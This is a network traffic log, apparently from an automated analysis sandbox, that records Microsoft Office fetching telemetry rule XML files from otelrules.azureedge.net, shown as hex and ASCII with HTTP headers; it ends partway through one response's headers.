                                                  2024-12-09 08:35:39 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  68192.168.2.44983613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:40 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 478
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                  ETag: "0x8DC582B9B233827"
                                                  x-ms-request-id: d196cbd9-901e-008f-5d03-4867a6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083540Z-r1cf579d778z4wflhC1EWRa3h000000007ug000000004fxp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:40 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  69192.168.2.44983513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:40 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:40 UTC491INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 423
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                  ETag: "0x8DC582BB7564CE8"
                                                  x-ms-request-id: 2f0750f4-201e-0000-61a2-49a537000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083540Z-r1cf579d778469knhC1EWR2gqc00000000g00000000006qz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:40 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  70192.168.2.44983713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:40 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                  ETag: "0x8DC582B95C61A3C"
                                                  x-ms-request-id: e267231f-301e-0099-3103-486683000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083540Z-r1cf579d778t6txphC1EWRsd44000000087g000000006a6c
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:40 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  71192.168.2.44983813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:40 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                  ETag: "0x8DC582BB046B576"
                                                  x-ms-request-id: 6d6f58af-101e-0028-33a4-498f64000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083540Z-r1cf579d7789jf56hC1EWRu58800000002z0000000003em6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:40 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  72192.168.2.44983913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:41 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:42 UTC471INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:41 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 400
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2D62837"
                                                  x-ms-request-id: 45d7ff1d-301e-0033-4715-4afa9c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083541Z-r1cf579d778l2x6lhC1EWRsptc00000000u0000000002h9u
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:42 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  73192.168.2.44984013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:42 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:42 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7D702D0"
                                                  x-ms-request-id: 08d9915d-201e-005d-1a7e-49afb3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083542Z-r1cf579d778j4j5fhC1EWR3ge800000001e0000000001rq4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:42 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  74192.168.2.44984113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:42 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:42 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 425
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                  ETag: "0x8DC582BBA25094F"
                                                  x-ms-request-id: c9f0d292-501e-0047-460d-49ce6c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083542Z-r1cf579d778t76vqhC1EWRdx4w00000001w0000000002h6r
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:42 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  75192.168.2.44984313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:42 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 448
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB389F49B"
                                                  x-ms-request-id: f8799778-401e-0064-72cc-4954af000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083542Z-r1cf579d778l2x6lhC1EWRsptc00000000w0000000001b42
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:43 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  76192.168.2.44984213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:42 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 475
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2BE84FD"
                                                  x-ms-request-id: 2968f52d-d01e-002b-1502-4825fb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083542Z-r1cf579d778qlpkrhC1EWRpfc800000008kg000000001zap
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:43 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  77192.168.2.44984413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:43 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:44 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:43 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 491
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B98B88612"
                                                  x-ms-request-id: 7ea70f1c-301e-005d-1d26-49e448000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083543Z-r1cf579d7789jf56hC1EWRu588000000030g000000002cfk
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:44 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  78192.168.2.44984513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:44 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:44 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 416
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                  ETag: "0x8DC582BAEA4B445"
                                                  x-ms-request-id: eee9af6d-a01e-001e-1905-4849ef000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083544Z-r1cf579d7789trgthC1EWRkkfc00000008m0000000001vk2
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
